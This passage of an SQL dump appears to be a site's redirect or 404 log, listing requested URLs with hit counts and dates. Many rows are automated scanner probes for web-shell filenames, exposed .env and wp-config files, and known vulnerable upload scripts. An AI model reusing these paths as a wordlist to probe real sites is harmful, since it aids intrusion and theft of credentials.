00:00:00',301),(42953,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,product_name',NULL,'','',1,0,'2025-06-30 13:58:20','0000-00-00 00:00:00',301),(42954,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-30 13:58:22','0000-00-00 00:00:00',301),(42955,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:24','0000-00-00 00:00:00',301),(42956,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:26','0000-00-00 00:00:00',301),(42957,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,product_sku',NULL,'','',1,0,'2025-06-30 13:58:27','0000-00-00 00:00:00',301),(42958,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:29','0000-00-00 00:00:00',301),(42959,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/dirdesc',NULL,'','',1,0,'2025-06-30 13:58:31','0000-00-00 00:00:00',301),(42960,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:33','0000-00-00 00:00:00',301),(42961,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-f?r??n?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:35','0000-00-00 00:00:00',301),(42962,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-d?????k-h??zl??',NULL,'','',1,0,'2025-06-30 13:58:36','0000-00-00 00:00:00',301),(42963,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-d?????k-h??zl??/by,`p`.product_sku',NULL,'','',1,0,'2025-06-30 13:58:38','0000-00-00 00:00:00',301),(42964,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-d?????k-h??zl??/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-30 13:58:40','0000-00-00 00:00:00',301),(42965,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-d?????k-h??zl??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:42','0000-00-00 00:00:00',301),(42966,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-d?????k-h??zl??/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:44','0000-00-00 00:00:00',301),(42967,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-d?????k-h??zl??/by,category_name',NULL,'','',1,0,'2025-06-30 13:58:46','0000-00-00 00:00:00',301),(42968,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-d?????k-h??zl??/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-30 13:58:47','0000-00-00 00:00:00',301),(42969,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-d?????k-h??zl??/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:49','0000-00-00 00:00:00',301),(42970,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-d?????k-h??zl??/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-30 13:58:51','0000-00-00 00:00:00',301),(42971,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-d?????k-h??zl??/by,mf_name',NULL,'','',1,0,'2025-06-30 13:58:53','0000-00-00 00:00:00',301),(42972,'http://3s-technologies.com.tr/tr/public/admin.php',NULL,'','',6,0,'2025-06-30 21:41:06','0000-00-00 00:00:00',301),(42973,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-07-01 05:36:15','0000-00-00 00:00:00',301),(42974,'http://www.3s-technologies.com.tr/tr/lib/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2025-07-02 10:54:11','0000-00-00 00:00:00',301),(42975,'http://www.3s-technologies.com.tr/tr/public/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2025-07-02 10:54:14','0000-00-00 00:00:00',301),(42976,'https://3s-technologies.com.tr/tr/dyadjj49h/image/upload/v1709826440/webpage_svg_dqlts3.svg',NULL,'https://3s-technologies.com.tr/dyadjj49h/image/upload/v1709826440/webpage_svg_dqlts3.svg','',5,0,'2025-07-02 23:25:43','0000-00-00 00:00:00',301),(42977,'https://www.3s-technologies.com.tr/tr/dyadjj49h/image/upload/v1709826440/webpage_svg_dqlts3.svg',NULL,'https://www.3s-technologies.com.tr/dyadjj49h/image/upload/v1709826440/webpage_svg_dqlts3.svg','',4,0,'2025-07-02 23:25:43','0000-00-00 00:00:00',301),(42978,'https://3s-technologies.com.tr/tr/.env.staging',NULL,'https://3s-technologies.com.tr/.env.staging','',11,0,'2025-07-03 02:42:47','0000-00-00 00:00:00',301),(42979,'http://3s-technologies.com.tr/tr/wp-content/403.php',NULL,'','',29,0,'2025-07-03 21:13:07','0000-00-00 00:00:00',301),(42980,'http://3s-technologies.com.tr/tr/css/colors/coffee/index.php',NULL,'','',18,0,'2025-07-03 21:13:08','0000-00-00 00:00:00',301),(42981,'http://3s-technologies.com.tr/tr/wp-includes/system_log.php',NULL,'','',19,0,'2025-07-03 21:13:20','0000-00-00 00:00:00',301),(42982,'http://3s-technologies.com.tr/tr/plugins/pwnd/as.php',NULL,'','',20,0,'2025-07-03 21:13:24','0000-00-00 00:00:00',301),(42983,'http://3s-technologies.com.tr/tr/index/fucku.php',NULL,'','',19,0,'2025-07-03 21:13:27','0000-00-00 00:00:00',301),(42984,'http://3s-technologies.com.tr/tr/alfa-rexhp1.php',NULL,'','',3,0,'2025-07-04 06:44:07','0000-00-00 00:00:00',301),(42985,'http://3s-technologies.com.tr/tr/public/index.php/en',NULL,'','',3,0,'2025-07-04 06:45:14','0000-00-00 00:00:00',301),(42986,'http://3s-technologies.com.tr/tr/pki-validation',NULL,'','',13,0,'2025-07-04 06:45:30','0000-00-00 00:00:00',301),(42987,'http://3s-technologies.com.tr/tr/autoloadclassmap.php',NULL,'','',12,0,'2025-07-04 06:46:04','0000-00-00 00:00:00',301),(42988,'http://3s-technologies.com.tr/tr/wp_wol.php',NULL,'','',4,0,'2025-07-04 06:46:24','0000-00-00 00:00:00',301),(42989,'http://3s-technologies.com.tr/tr/rbh/log',NULL,'','',3,0,'2025-07-04 06:46:35','0000-00-00 00:00:00',301),(42990,'http://3s-technologies.com.tr/tr/disagrsod.php',NULL,'','',3,0,'2025-07-04 06:46:48','0000-00-00 00:00:00',301),(42991,'http://3s-technologies.com.tr/tr/wq.php7',NULL,'','',5,0,'2025-07-04 06:46:49','0000-00-00 00:00:00',301),(42992,'http://3s-technologies.com.tr/tr/forum.php',NULL,'','',7,0,'2025-07-04 06:46:49','0000-00-00 00:00:00',301),(42993,'http://3s-technologies.com.tr/tr/ab1ux1ft.php',NULL,'','',5,0,'2025-07-04 06:46:53','0000-00-00 00:00:00',301),(42994,'http://3s-technologies.com.tr/tr/tutorial.php',NULL,'','',3,0,'2025-07-04 06:46:54','0000-00-00 00:00:00',301),(42995,'http://3s-technologies.com.tr/tr/myk4tjeffvo.php',NULL,'','',4,0,'2025-07-04 06:46:57','0000-00-00 00:00:00',301),(42996,'http://3s-technologies.com.tr/tr/120f9.php',NULL,'','',3,0,'2025-07-04 06:46:57','0000-00-00 00:00:00',301),(42997,'http://3s-technologies.com.tr/tr/shell20211022.php',NULL,'','',5,0,'2025-07-04 06:47:01','0000-00-00 00:00:00',301),(42998,'http://3s-technologies.com.tr/tr/migrate.php',NULL,'','',4,0,'2025-07-04 06:47:02','0000-00-00 00:00:00',301),(42999,'http://3s-technologies.com.tr/tr/wp-admin/js/qxuho.php',NULL,'','',3,0,'2025-07-04 06:47:04','0000-00-00 00:00:00',301),(43000,'http://3s-technologies.com.tr/tr/catuploadcsv.php',NULL,'','',5,0,'2025-07-04 06:47:08','0000-00-00 00:00:00',301),(43001,'http://3s-technologies.com.tr/tr/test.php7',NULL,'','',17,0,'2025-07-04 06:47:09','0000-00-00 00:00:00',301),(43002,'http://3s-technologies.com.tr/tr/fucixwya.php',NULL,'','',3,0,'2025-07-04 06:47:13','0000-00-00 00:00:00',301),(43003,'http://3s-technologies.com.tr/tr/login/files.php',NULL,'','',3,0,'2025-07-04 06:47:14','0000-00-00 00:00:00',301),(43004,'http://3s-technologies.com.tr/tr/depotcv.php',NULL,'','',5,0,'2025-07-04 06:47:15','0000-00-00 00:00:00',301),(43005,'http://3s-technologies.com.tr/tr/baja.php',NULL,'','',13,0,'2025-07-04 06:47:15','0000-00-00 00:00:00',301),(43006,'http://3s-technologies.com.tr/tr/themes/zmous',NULL,'','',3,0,'2025-07-04 06:47:29','0000-00-00 00:00:00',301),(43007,'http://3s-technologies.com.tr/tr/wp-includes/bmccxior.php',NULL,'','',3,0,'2025-07-04 06:47:29','0000-00-00 00:00:00',301),(43008,'http://3s-technologies.com.tr/tr/othiondwmek.php',NULL,'','',4,0,'2025-07-04 06:47:30','0000-00-00 00:00:00',301),(43009,'http://3s-technologies.com.tr/tr/disagraep.php',NULL,'','',3,0,'2025-07-04 06:47:34','0000-00-00 00:00:00',301),(43010,'http://3s-technologies.com.tr/tr/query.php',NULL,'','',3,0,'2025-07-04 06:47:37','0000-00-00 00:00:00',301),(43011,'http://3s-technologies.com.tr/tr/services.php',NULL,'','',3,0,'2025-07-04 06:47:38','0000-00-00 00:00:00',301),(43012,'http://3s-technologies.com.tr/tr/about.php525',NULL,'','',4,0,'2025-07-04 06:47:40','0000-00-00 00:00:00',301),(43013,'http://3s-technologies.com.tr/tr/configuracion.php',NULL,'','',3,0,'2025-07-04 06:47:49','0000-00-00 00:00:00',301),(43014,'http://3s-technologies.com.tr/tr/83064.php',NULL,'','',4,0,'2025-07-04 06:47:50','0000-00-00 00:00:00',301),(43015,'http://3s-technologies.com.tr/tr/hyippxwdq.php',NULL,'','',4,0,'2025-07-04 06:47:50','0000-00-00 00:00:00',301),(43016,'http://3s-technologies.com.tr/tr/daddy.php',NULL,'','',4,0,'2025-07-04 06:47:51','0000-00-00 00:00:00',301),(43017,'http://3s-technologies.com.tr/tr/alert.php',NULL,'','',4,0,'2025-07-04 06:47:51','0000-00-00 00:00:00',301),(43018,'http://3s-technologies.com.tr/tr/idhrilrlb.php',NULL,'','',4,0,'2025-07-04 06:48:04','0000-00-00 00:00:00',301),(43019,'http://3s-technologies.com.tr/tr/css/dist',NULL,'','',3,0,'2025-07-04 06:48:13','0000-00-00 00:00:00',301),(43020,'http://3s-technologies.com.tr/tr/images/wp-ok.php',NULL,'','',3,0,'2025-07-04 06:48:17','0000-00-00 00:00:00',301),(43021,'http://3s-technologies.com.tr/tr/bibil_0day.php',NULL,'','',4,0,'2025-07-04 06:48:20','0000-00-00 00:00:00',301),(43022,'http://3s-technologies.com.tr/tr/headerg.php',NULL,'','',5,0,'2025-07-04 06:48:25','0000-00-00 00:00:00',301),(43023,'http://3s-technologies.com.tr/tr/ulc2.php',NULL,'','',3,0,'2025-07-04 06:48:25','0000-00-00 00:00:00',301),(43024,'http://3s-technologies.com.tr/tr/welcome.php',NULL,'','',4,0,'2025-07-04 06:48:26','0000-00-00 00:00:00',301),(43025,'http://3s-technologies.com.tr/tr/download.php',NULL,'','',7,0,'2025-07-04 06:48:27','0000-00-00 00:00:00',301),(43026,'http://3s-technologies.com.tr/tr/superadmin.php',NULL,'','',3,0,'2025-07-04 06:48:31','0000-00-00 00:00:00',301),(43027,'http://3s-technologies.com.tr/tr/allez.php',NULL,'','',4,0,'2025-07-04 06:48:41','0000-00-00 00:00:00',301),(43028,'http://3s-technologies.com.tr/tr/css/wp-22.php',NULL,'','',3,0,'2025-07-04 06:49:03','0000-00-00 00:00:00',301),(43029,'http://3s-technologies.com.tr/tr/uploads/2014/03/smile.php',NULL,'','',3,0,'2025-07-04 06:49:12','0000-00-00 00:00:00',301),(43030,'http://www.3s-technologies.com.tr/tr/sendgrid.env',NULL,'','',4,0,'2025-07-05 01:45:33','0000-00-00 00:00:00',301),(43031,'http://www.3s-technologies.com.tr/tr/twilio.env',NULL,'','',4,0,'2025-07-05 01:45:36','0000-00-00 00:00:00',301),(43032,'http://www.3s-technologies.com.tr/tr/api/.env',NULL,'','',5,0,'2025-07-05 01:45:38','0000-00-00 00:00:00',301),(43033,'http://www.3s-technologies.com.tr/tr/dev/.env',NULL,'','',4,0,'2025-07-05 01:45:41','0000-00-00 00:00:00',301),(43034,'http://www.3s-technologies.com.tr/tr/app_dev.php/_profiler/phpinfo',NULL,'','',4,0,'2025-07-05 01:45:42','0000-00-00 00:00:00',301),(43035,'http://3s-technologies.com.tr/tr/sites/default/modules/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2025-07-05 02:18:45','0000-00-00 00:00:00',301),(43036,'http://3s-technologies.com.tr/tr/xcc.php',NULL,'','',2,0,'2025-07-05 11:12:46','0000-00-00 00:00:00',301),(43037,'http://3s-technologies.com.tr/tr/classwithtostring.php/rbzccnnp.php',NULL,'','',1,0,'2025-07-05 11:12:48','0000-00-00 00:00:00',301),(43038,'http://3s-technologies.com.tr/tr/.tmb/autoload_classmap.php',NULL,'','',1,0,'2025-07-05 11:12:52','0000-00-00 00:00:00',301),(43039,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/gecko-new.php',NULL,'','',1,0,'2025-07-05 11:12:55','0000-00-00 00:00:00',301),(43040,'http://3s-technologies.com.tr/tr/wp-content/uploads/2023/10/autoload_classmap.php',NULL,'','',1,0,'2025-07-05 11:12:59','0000-00-00 00:00:00',301),(43041,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/new.php',NULL,'','',1,0,'2025-07-05 11:13:19','0000-00-00 00:00:00',301),(43042,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/file.php',NULL,'','',1,0,'2025-07-05 11:13:21','0000-00-00 00:00:00',301),(43043,'http://3s-technologies.com.tr/tr/wp-includes/blocks/heading/autoload_classmap.php',NULL,'','',1,0,'2025-07-05 11:13:22','0000-00-00 00:00:00',301),(43044,'http://3s-technologies.com.tr/tr/wp-content/bk.php',NULL,'','',1,0,'2025-07-05 11:13:25','0000-00-00 00:00:00',301),(43045,'https://3s-technologies.com.tr/en/wp-json',NULL,'','',7,0,'2025-07-05 20:51:59','0000-00-00 00:00:00',301),(43046,'https://3s-technologies.com.tr/tr/qmnpukxccz5qohwlwdaikgp9vjtrqgtszyyjr7bccwl3yt',NULL,'https://3s-technologies.com.tr/QmNPukXccZ5qohWLwdaikGp9vjTrqGtSZYYjR7bCCwL3yt','',5,0,'2025-07-06 00:22:01','0000-00-00 00:00:00',301),(43047,'http://3s-technologies.com.tr/tr/wp-singin.php',NULL,'','',7,0,'2025-07-06 17:41:49','0000-00-00 00:00:00',301),(43048,'http://3s-technologies.com.tr/tr/cah.php',NULL,'','',35,0,'2025-07-06 17:42:09','0000-00-00 00:00:00',301),(43049,'http://3s-technologies.com.tr/tr/sanskrit.php',NULL,'','',86,0,'2025-07-06 17:42:10','0000-00-00 00:00:00',301),(43050,'http://3s-technologies.com.tr/tr/wp-includes/pomo/fgertreyersd.php',NULL,'','',13,0,'2025-07-06 17:43:28','0000-00-00 00:00:00',301),(43051,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/gzdecodes.php',NULL,'','',13,0,'2025-07-06 17:44:41','0000-00-00 00:00:00',301),(43052,'http://3s-technologies.com.tr/tr/sites/all/modules/contrib/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2025-07-07 01:43:07','0000-00-00 00:00:00',301),(43053,'https://3s-technologies.com.tr/tr/mvpanxyntnylhkmyr04y',NULL,'https://3s-technologies.com.tr/mVPAnXYNTNyLhKMyr04y','',1,0,'2025-07-07 22:04:49','0000-00-00 00:00:00',301),(43054,'https://www.3s-technologies.com.tr/tr/mvpanxyntnylhkmyr04y',NULL,'https://www.3s-technologies.com.tr/mVPAnXYNTNyLhKMyr04y','',1,0,'2025-07-07 22:04:49','0000-00-00 00:00:00',301),(43055,'https://mail.3s-technologies.com.tr/wp-admin/admin-ajax.php',NULL,'','',1,0,'2025-07-08 00:40:33','0000-00-00 00:00:00',301),(43056,'http://3s-technologies.com.tr/tr/wp-admin/images/as.php',NULL,'','',1,0,'2025-07-08 03:48:28','0000-00-00 00:00:00',301),(43057,'https://3s-technologies.com.tr/en/plugins/content/jw_allvideos/jw_allvideos/includes/js/\'   videoposter   \'',NULL,'','',2,0,'2025-07-08 07:11:11','0000-00-00 00:00:00',301),(43058,'https://3s-technologies.com.tr/en/plugins/content/jw_allvideos/jw_allvideos/includes/js/\'   videourl   \'',NULL,'','',2,0,'2025-07-08 07:11:12','0000-00-00 00:00:00',301),(43059,'http://3s-technologies.com.tr/tr/yonet',NULL,'','',1,0,'2025-07-08 12:45:26','0000-00-00 00:00:00',301),(43060,'http://3s-technologies.com.tr/tr/.well-known/log.php',NULL,'','',65,0,'2025-07-08 17:13:24','0000-00-00 00:00:00',301),(43061,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/getid3s.php',NULL,'','',14,0,'2025-07-08 17:13:44','0000-00-00 00:00:00',301),(43062,'http://3s-technologies.com.tr/tr/wp-config.php_',NULL,'','',1,0,'2025-07-09 05:34:38','0000-00-00 00:00:00',301),(43063,'http://3s-technologies.com.tr/en/gdftps.php',NULL,'','',1,0,'2025-07-09 11:03:03','0000-00-00 00:00:00',301),(43064,'http://3s-technologies.com.tr/tr/wp-includes/assets/admin.php',NULL,'','',30,0,'2025-07-09 11:51:22','0000-00-00 00:00:00',301),(43065,'http://3s-technologies.com.tr/tr/infoo.php',NULL,'','',13,0,'2025-07-09 11:51:44','0000-00-00 00:00:00',301),(43066,'http://3s-technologies.com.tr/tr/css/colors/blue/atomlib.php',NULL,'','',9,0,'2025-07-09 11:51:52','0000-00-00 00:00:00',301),(43067,'http://3s-technologies.com.tr/tr/muse.php',NULL,'','',11,0,'2025-07-09 11:52:08','0000-00-00 00:00:00',301),(43068,'http://3s-technologies.com.tr/tr/alfa-rex2.php',NULL,'','',17,0,'2025-07-09 11:52:09','0000-00-00 00:00:00',301),(43069,'http://3s-technologies.com.tr/tr/wp-admin/yindu.php',NULL,'','',9,0,'2025-07-09 11:52:29','0000-00-00 00:00:00',301),(43070,'https://3s-technologies.com.tr/tr/images/xinbdwj0ljonkrmoxjqq2a2w4.svg',NULL,'https://3s-technologies.com.tr/images/XinBdWj0LJonkRmoXJqq2A2w4.svg','',1,0,'2025-07-09 19:47:34','0000-00-00 00:00:00',301),(43071,'https://www.3s-technologies.com.tr/tr/images/xinbdwj0ljonkrmoxjqq2a2w4.svg',NULL,'https://www.3s-technologies.com.tr/images/XinBdWj0LJonkRmoXJqq2A2w4.svg','',1,0,'2025-07-09 19:47:34','0000-00-00 00:00:00',301),(43072,'http://3s-technologies.com.tr/tr/0x1949.php',NULL,'','',40,0,'2025-07-10 00:48:03','0000-00-00 00:00:00',301),(43073,'http://3s-technologies.com.tr/tr/wp-includes/images/psh.php',NULL,'','',1,0,'2025-07-10 00:48:13','0000-00-00 00:00:00',301),(43074,'http://3s-technologies.com.tr/tr/tools/a-z/index.php',NULL,'','',1,0,'2025-07-10 00:48:36','0000-00-00 00:00:00',301),(43075,'http://3s-technologies.com.tr/tr/article/view.php',NULL,'','',1,0,'2025-07-10 00:48:36','0000-00-00 00:00:00',301),(43076,'http://3s-technologies.com.tr/tr/showproduct.php',NULL,'','',1,0,'2025-07-10 00:48:37','0000-00-00 00:00:00',301),(43077,'http://3s-technologies.com.tr/tr/mod/forum/view.php',NULL,'','',1,0,'2025-07-10 00:48:38','0000-00-00 00:00:00',301),(43078,'http://3s-technologies.com.tr/en/news_info.php',NULL,'','',1,0,'2025-07-10 00:48:39','0000-00-00 00:00:00',301),(43079,'http://3s-technologies.com.tr/en/category.php',NULL,'','',1,0,'2025-07-10 00:48:39','0000-00-00 00:00:00',301),(43080,'http://3s-technologies.com.tr/en/alonepage.php',NULL,'','',1,0,'2025-07-10 00:48:40','0000-00-00 00:00:00',301),(43081,'http://3s-technologies.com.tr/en/edu/show.php',NULL,'','',1,0,'2025-07-10 00:48:41','0000-00-00 00:00:00',301),(43082,'http://3s-technologies.com.tr/en/faculty/show.php',NULL,'','',1,0,'2025-07-10 00:48:43','0000-00-00 00:00:00',301),(43083,'http://3s-technologies.com.tr/en/pd.php',NULL,'','',1,0,'2025-07-10 00:48:43','0000-00-00 00:00:00',301),(43084,'http://3s-technologies.com.tr/en/detail.php',NULL,'','',1,0,'2025-07-10 00:48:44','0000-00-00 00:00:00',301),(43085,'http://3s-technologies.com.tr/en/brand.php',NULL,'','',3,0,'2025-07-10 00:48:45','0000-00-00 00:00:00',301),(43086,'http://3s-technologies.com.tr/en/show_ser.php',NULL,'','',1,0,'2025-07-10 00:48:46','0000-00-00 00:00:00',301),(43087,'http://3s-technologies.com.tr/en/view_55555.php',NULL,'','',1,0,'2025-07-10 00:48:47','0000-00-00 00:00:00',301),(43088,'http://3s-technologies.com.tr/en/article.php',NULL,'','',1,0,'2025-07-10 00:48:47','0000-00-00 00:00:00',301),(43089,'http://3s-technologies.com.tr/en/desc.php',NULL,'','',1,0,'2025-07-10 00:48:49','0000-00-00 00:00:00',301),(43090,'http://3s-technologies.com.tr/en/msg.php',NULL,'','',1,0,'2025-07-10 00:48:50','0000-00-00 00:00:00',301),(43091,'http://www.3s-technologies.com.tr/tr/configprops',NULL,'http://www.3s-technologies.com.tr/configprops','',1,0,'2025-07-10 20:25:53','0000-00-00 00:00:00',301),(43092,'http://3s-technologies.com.tr/tr/configprops',NULL,'http://3s-technologies.com.tr/configprops','',1,0,'2025-07-10 20:25:53','0000-00-00 00:00:00',301),(43093,'http://3s-technologies.com.tr/tr/v2.zip',NULL,'http://3s-technologies.com.tr/v2.zip','',1,0,'2025-07-11 05:53:51','0000-00-00 00:00:00',301),(43094,'http://3s-technologies.com.tr/tr/themes.zip',NULL,'http://3s-technologies.com.tr/themes.zip','',1,0,'2025-07-11 05:53:51','0000-00-00 00:00:00',301),(43095,'http://3s-technologies.com.tr/tr/cgi-bin/cgi-bin/about.php7',NULL,'','',3,0,'2025-07-11 09:57:35','0000-00-00 00:00:00',301),(43096,'http://3s-technologies.com.tr/tr/geju.php/wp-includes/images/about.php',NULL,'','',7,0,'2025-07-11 11:36:29','0000-00-00 00:00:00',301),(43097,'http://3s-technologies.com.tr/tr/actuator/configprops',NULL,'http://3s-technologies.com.tr/actuator/configprops','',1,0,'2025-07-12 06:21:10','0000-00-00 00:00:00',301),(43098,'http://www.3s-technologies.com.tr/tr/actuator/configprops',NULL,'http://www.3s-technologies.com.tr/actuator/configprops','',2,0,'2025-07-12 06:21:10','0000-00-00 00:00:00',301),(43099,'http://3s-technologies.com.tr/tr/article.php',NULL,'','',53,0,'2025-07-12 06:37:24','0000-00-00 00:00:00',301),(43100,'http://3s-technologies.com.tr/tr/plugins/cache/footer.php',NULL,'','',49,0,'2025-07-12 06:37:40','0000-00-00 00:00:00',301),(43101,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/preferences/wp-login.php',NULL,'','',20,0,'2025-07-12 06:37:57','0000-00-00 00:00:00',301),(43102,'http://3s-technologies.com.tr/tr/css/colors/blue/index.php',NULL,'','',51,0,'2025-07-12 06:38:00','0000-00-00 00:00:00',301),(43103,'http://3s-technologies.com.tr/en/login',NULL,'','',18,0,'2025-07-12 15:03:20','0000-00-00 00:00:00',301),(43104,'http://3s-technologies.com.tr/tr/.env.example',NULL,'','',10,0,'2025-07-12 21:15:17','0000-00-00 00:00:00',301),(43105,'http://3s-technologies.com.tr/tr/sleepster',NULL,'','',10,0,'2025-07-13 01:15:28','0000-00-00 00:00:00',301),(43106,'http://3s-technologies.com.tr/tr/404.shtml',NULL,'','',15,0,'2025-07-13 01:16:05','0000-00-00 00:00:00',301),(43107,'http://3s-technologies.com.tr/tr/admin.php/controller/extension/extension/ultra.php',NULL,'','',10,0,'2025-07-13 01:16:13','0000-00-00 00:00:00',301),(43108,'http://3s-technologies.com.tr/tr/wp67/manager.php',NULL,'','',10,0,'2025-07-13 01:16:25','0000-00-00 00:00:00',301),(43109,'http://3s-technologies.com.tr/tr/gmo.php',NULL,'','',185,0,'2025-07-13 01:16:28','0000-00-00 00:00:00',301),(43110,'http://3s-technologies.com.tr/tr/language/cron.php',NULL,'','',10,0,'2025-07-13 01:16:29','0000-00-00 00:00:00',301),(43111,'http://3s-technologies.com.tr/tr/admin/controller/extension/extension/admin.php',NULL,'','',10,0,'2025-07-13 01:16:30','0000-00-00 00:00:00',301),(43112,'http://3s-technologies.com.tr/tr/perodua-malaysia/classwithtostring.php',NULL,'','',10,0,'2025-07-13 01:16:34','0000-00-00 00:00:00',301),(43113,'http://3s-technologies.com.tr/tr/wp-includes/id3/admin.php',NULL,'','',14,0,'2025-07-13 01:16:39','0000-00-00 00:00:00',301),(43114,'http://3s-technologies.com.tr/tr/admiin.php',NULL,'','',21,0,'2025-07-13 01:16:46','0000-00-00 00:00:00',301),(43115,'http://3s-technologies.com.tr/tr/wp-content/uploads/de_fb_uploads/bypass.php',NULL,'','',10,0,'2025-07-13 01:16:49','0000-00-00 00:00:00',301),(43116,'http://3s-technologies.com.tr/tr/wp-content/uploads/de_fb_uploads/b.phpde_fb_uploads&upload=gaskan',NULL,'','',9,0,'2025-07-13 01:16:50','0000-00-00 00:00:00',301),(43117,'http://3s-technologies.com.tr/tr/wp-content/uploads/2023/08/admin.php',NULL,'','',10,0,'2025-07-13 01:16:50','0000-00-00 00:00:00',301),(43118,'http://3s-technologies.com.tr/tr/wp-content.php.php',NULL,'','',25,0,'2025-07-13 02:48:07','0000-00-00 00:00:00',301),(43119,'https://3s-technologies.com.tr/tr/wp-content/plugins/simple-file-list/readme.txt',NULL,'','',2,0,'2025-07-13 13:34:40','0000-00-00 00:00:00',301),(43120,'http://3s-technologies.com.tr/tr/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2025-07-14 03:41:02','0000-00-00 00:00:00',301),(43121,'http://3s-technologies.com.tr/tr/anonse/lock360.php',NULL,'','',14,0,'2025-07-14 03:45:48','0000-00-00 00:00:00',301),(43122,'http://3s-technologies.com.tr/tr/xmanager.php',NULL,'','',1,0,'2025-07-14 03:45:49','0000-00-00 00:00:00',301),(43123,'http://3s-technologies.com.tr/tr/header-function.php',NULL,'','',1,0,'2025-07-14 03:45:49','0000-00-00 00:00:00',301),(43124,'http://3s-technologies.com.tr/tr/wp-*.php',NULL,'','',1,0,'2025-07-14 03:45:50','0000-00-00 00:00:00',301),(43125,'http://3s-technologies.com.tr/tr/exetasi.php',NULL,'','',1,0,'2025-07-14 03:45:51','0000-00-00 00:00:00',301),(43126,'http://3s-technologies.com.tr/tr/hex.php',NULL,'','',3,0,'2025-07-14 03:45:52','0000-00-00 00:00:00',301),(43127,'http://3s-technologies.com.tr/tr/iu.php',NULL,'','',1,0,'2025-07-14 03:45:53','0000-00-00 00:00:00',301),(43128,'http://3s-technologies.com.tr/tr/kominfo.php',NULL,'','',1,0,'2025-07-14 03:45:53','0000-00-00 00:00:00',301),(43129,'http://3s-technologies.com.tr/tr/nano.php',NULL,'','',10,0,'2025-07-14 03:45:54','0000-00-00 00:00:00',301),(43130,'http://3s-technologies.com.tr/tr/search.php',NULL,'','',5,0,'2025-07-14 03:45:54','0000-00-00 00:00:00',301),(43131,'http://3s-technologies.com.tr/tr/selonboy.php',NULL,'','',1,0,'2025-07-14 03:45:55','0000-00-00 00:00:00',301),(43132,'http://3s-technologies.com.tr/tr/wp-login1.php',NULL,'','',1,0,'2025-07-14 03:46:01','0000-00-00 00:00:00',301),(43133,'http://3s-technologies.com.tr/tr/wp-madrid.php',NULL,'','',1,0,'2025-07-14 03:46:04','0000-00-00 00:00:00',301),(43134,'http://3s-technologies.com.tr/tr/img/index.php',NULL,'','',1,0,'2025-07-14 03:46:04','0000-00-00 00:00:00',301),(43135,'http://3s-technologies.com.tr/tr/pomo.php',NULL,'','',16,0,'2025-07-14 03:46:05','0000-00-00 00:00:00',301),(43136,'http://3s-technologies.com.tr/tr/odul.php',NULL,'','',1,0,'2025-07-14 03:46:06','0000-00-00 00:00:00',301),(43137,'http://3s-technologies.com.tr/tr/optimasprimemoxhag.php',NULL,'','',1,0,'2025-07-14 03:46:07','0000-00-00 00:00:00',301),(43138,'http://3s-technologies.com.tr/tr/taf.php',NULL,'','',2,0,'2025-07-14 03:46:08','0000-00-00 00:00:00',301),(43139,'http://3s-technologies.com.tr/tr/wordfence-waf.php',NULL,'','',1,0,'2025-07-14 03:46:09','0000-00-00 00:00:00',301),(43140,'http://3s-technologies.com.tr/tr/vhosts/about.php',NULL,'','',1,0,'2025-07-14 03:46:09','0000-00-00 00:00:00',301),(43141,'http://3s-technologies.com.tr/tr/vhosts/admin.php',NULL,'','',1,0,'2025-07-14 03:46:09','0000-00-00 00:00:00',301),(43142,'http://3s-technologies.com.tr/tr/vhosts/dropdown.php',NULL,'','',1,0,'2025-07-14 03:46:10','0000-00-00 